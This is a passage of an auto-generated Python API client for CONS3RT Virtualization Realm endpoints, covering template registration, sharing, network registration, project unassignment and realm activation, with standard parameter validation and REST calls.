raise ApiValueError("Missing the required parameter `id` when calling `list_template_subscriptions`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/templates/subscriptions', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[MinimalTemplateSubscription]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_unregistered_templates(self, id, **kwargs): # noqa: E501
"""List Unregistered Templates # noqa: E501
Returns a collection of the unregistered, back-end Templates in the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_unregistered_templates(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[Cons3rtTemplateTagData]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_unregistered_templates_with_http_info(id, **kwargs) # noqa: E501
def list_unregistered_templates_with_http_info(self, id, **kwargs): # noqa: E501
"""List Unregistered Templates # noqa: E501
Returns a collection of the unregistered, back-end Templates in the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_unregistered_templates_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[Cons3rtTemplateTagData], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_unregistered_templates" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `list_unregistered_templates`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/templates/registrations/pending', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Cons3rtTemplateTagData]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def register_network(self, id, network_identifier, **kwargs): # noqa: E501
"""Register Network # noqa: E501
Adds an existing, back-end Network the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.register_network(id, network_identifier, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param str network_identifier: Back-end network identifier (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.register_network_with_http_info(id, network_identifier, **kwargs) # noqa: E501
def register_network_with_http_info(self, id, network_identifier, **kwargs): # noqa: E501
"""Register Network # noqa: E501
Adds an existing, back-end Network the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.register_network_with_http_info(id, network_identifier, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param str network_identifier: Back-end network identifier (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'network_identifier'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method register_network" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `register_network`") # noqa: E501
# verify the required parameter 'network_identifier' is set
if self.api_client.client_side_validation and ('network_identifier' not in local_var_params or # noqa: E501
local_var_params['network_identifier'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `network_identifier` when calling `register_network`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'network_identifier' in local_var_params:
path_params['networkIdentifier'] = local_var_params['network_identifier'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/networks/{networkIdentifier}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def register_template(self, id, **kwargs): # noqa: E501
"""Register Template # noqa: E501
Adds an existing back-end Template to the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.register_template(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param InputRegisterTemplateObject input_register_template_object: The template registration data
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: FullTemplateRegistration
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.register_template_with_http_info(id, **kwargs) # noqa: E501
def register_template_with_http_info(self, id, **kwargs): # noqa: E501
"""Register Template # noqa: E501
Adds an existing back-end Template to the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.register_template_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param InputRegisterTemplateObject input_register_template_object: The template registration data
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(FullTemplateRegistration, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'input_register_template_object'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method register_template" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `register_template`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'input_register_template_object' in local_var_params:
body_params = local_var_params['input_register_template_object']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/templates/registrations', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FullTemplateRegistration', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def remove_project(self, id, project_id, **kwargs): # noqa: E501
"""Unassign Project # noqa: E501
Revokes Project member access to the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.remove_project(id, project_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param str project_id: ID of project to unassign (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.remove_project_with_http_info(id, project_id, **kwargs) # noqa: E501
def remove_project_with_http_info(self, id, project_id, **kwargs): # noqa: E501
"""Unassign Project # noqa: E501
Revokes Project member access to the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.remove_project_with_http_info(id, project_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param str project_id: ID of project to unassign (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'project_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method remove_project" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `remove_project`") # noqa: E501
# verify the required parameter 'project_id' is set
if self.api_client.client_side_validation and ('project_id' not in local_var_params or # noqa: E501
local_var_params['project_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `project_id` when calling `remove_project`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'project_id' in local_var_params and local_var_params['project_id'] is not None: # noqa: E501
query_params.append(('projectId', local_var_params['project_id'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/projects', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def retrieve_template_registration(self, id, registration_id, **kwargs): # noqa: E501
"""Retrieve Template Registration # noqa: E501
Returns a single Template Registration in the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.retrieve_template_registration(id, registration_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param int registration_id: ID of template registration (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: FullTemplateRegistration
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.retrieve_template_registration_with_http_info(id, registration_id, **kwargs) # noqa: E501
def retrieve_template_registration_with_http_info(self, id, registration_id, **kwargs): # noqa: E501
"""Retrieve Template Registration # noqa: E501
Returns a single Template Registration in the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.retrieve_template_registration_with_http_info(id, registration_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param int registration_id: ID of template registration (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(FullTemplateRegistration, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'registration_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method retrieve_template_registration" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `retrieve_template_registration`") # noqa: E501
# verify the required parameter 'registration_id' is set
if self.api_client.client_side_validation and ('registration_id' not in local_var_params or # noqa: E501
local_var_params['registration_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `registration_id` when calling `retrieve_template_registration`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'registration_id' in local_var_params:
path_params['registration_id'] = local_var_params['registration_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/templates/registrations/{registration_id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FullTemplateRegistration', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def set_virtualization_realm_active(self, id, activate, **kwargs): # noqa: E501
"""Update State # noqa: E501
Updates the active State for a single Virtualization Realm by the given ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_virtualization_realm_active(id, activate, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param bool activate: Activate or deactivate virtualization realm (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.set_virtualization_realm_active_with_http_info(id, activate, **kwargs) # noqa: E501
def set_virtualization_realm_active_with_http_info(self, id, activate, **kwargs): # noqa: E501
"""Update State # noqa: E501
Updates the active State for a single Virtualization Realm by the given ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_virtualization_realm_active_with_http_info(id, activate, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param bool activate: Activate or deactivate virtualization realm (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'activate'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method set_virtualization_realm_active" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `set_virtualization_realm_active`") # noqa: E501
# verify the required parameter 'activate' is set
if self.api_client.client_side_validation and ('activate' not in local_var_params or # noqa: E501
local_var_params['activate'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `activate` when calling `set_virtualization_realm_active`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'activate' in local_var_params and local_var_params['activate'] is not None: # noqa: E501
query_params.append(('activate', local_var_params['activate'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/activate', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def share_template_registration(self, id, registration_id, target_realm_ids, **kwargs): # noqa: E501
"""Share Template # noqa: E501
Shares an existing Template Registration in the specified Virtualization Realm to the provided external Virtualization Realm(s). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.share_template_registration(id, registration_id, target_realm_ids, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param int registration_id: ID of template registration (required)
:param list[int] target_realm_ids: ID(s) of external virtualization realms to share template registration with (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.share_template_registration_with_http_info(id, registration_id, target_realm_ids, **kwargs) # noqa: E501
def share_template_registration_with_http_info(self, id, registration_id, target_realm_ids, **kwargs): # noqa: E501
"""Share Template # noqa: E501
Shares an existing Template Registration in the specified Virtualization Realm to the provided external Virtualization Realm(s). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.share_template_registration_with_http_info(id, registration_id, target_realm_ids, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param int registration_id: ID of template registration (required)
:param list[int] target_realm_ids: ID(s) of external virtualization realms to share template registration with (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'registration_id', 'target_realm_ids'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method share_template_registration" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `share_template_registration`") # noqa: E501
# verify the required parameter 'registration_id' is set
if self.api_client.client_side_validation and ('registration_id' not in local_var_params or # noqa: E501
local_var_params['registration_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `registration_id` when calling `share_template_registration`") # noqa: E501
# verify the required parameter 'target_realm_ids' is set
if self.api_client.client_side_validation and ('target_realm_ids' not in local_var_params or # noqa: E501
local_var_params['target_realm_ids'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `target_realm_ids` when calling `share_template_registration`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'registration_id' in local_var_params:
path_params['registration_id'] = local_var_params['registration_id'] # noqa: E501
query_params = []
if 'target_realm_ids' in local_var_params and local_var_params['target_realm_ids'] is not None: # noqa: E501
query_params.append(('target_realm_ids', local_var_params['target_realm_ids'])) # noqa: E501
collection_formats['target_realm_ids'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/templates/registrations/{registration_id}/share', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def unregister_template(self, id, registration_id, input_unregister_template_object, **kwargs): # noqa: E501
"""Delete Template Registration # noqa: E501
Removes an existing Template Registration from the specified Virtualization Realm.<br> <br> Note: Unregistering a Template will remove all subscriptions to the Template from other Virtualization Realms. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.unregister_template(id, registration_id, input_unregister_template_object, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param int registration_id: ID of template registration (required)
:param InputUnregisterTemplateObject input_unregister_template_object: The deletion settings (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.unregister_template_with_http_info(id, registration_id, input_unregister_template_object, **kwargs) # noqa: E501
def unregister_template_with_http_info(self, id, registration_id, input_unregister_template_object, **kwargs): # noqa: E501
"""Delete Template Registration # noqa: E501
Removes an existing Template Registration from the specified Virtualization Realm.<br> <br> Note: Unregistering a Template will remove all subscriptions to the Template from other Virtualization Realms. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.unregister_template_with_http_info(id, registration_id, input_unregister_template_object, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param int registration_id: ID of template registration (required)
:param InputUnregisterTemplateObject input_unregister_template_object: The deletion settings (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'registration_id', 'input_unregister_template_object'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method unregister_template" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `unregister_template`") # noqa: E501
# verify the required parameter 'registration_id' is set
if self.api_client.client_side_validation and ('registration_id' not in local_var_params or # noqa: E501
local_var_params['registration_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `registration_id` when calling `unregister_template`") # noqa: E501
# verify the required parameter 'input_unregister_template_object' is set
if self.api_client.client_side_validation and ('input_unregister_template_object' not in local_var_params or # noqa: E501
local_var_params['input_unregister_template_object'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `input_unregister_template_object` when calling `unregister_template`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'registration_id' in local_var_params:
path_params['registration_id'] = local_var_params['registration_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'input_unregister_template_object' in local_var_params:
body_params = local_var_params['input_unregister_template_object']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/templates/registrations/{registration_id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def unshare_template_registration(self, id, registration_id, target_realm_id, **kwargs): # noqa: E501
"""Unshare Template # noqa: E501
Revokes access to a Template Registration in the specified Virtualization Realm by the provided external Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.unshare_template_registration(id, registration_id, target_realm_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param int registration_id: ID of template registration (required)
:param int target_realm_id: ID of external virtualization realm to revoke template registration access for (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
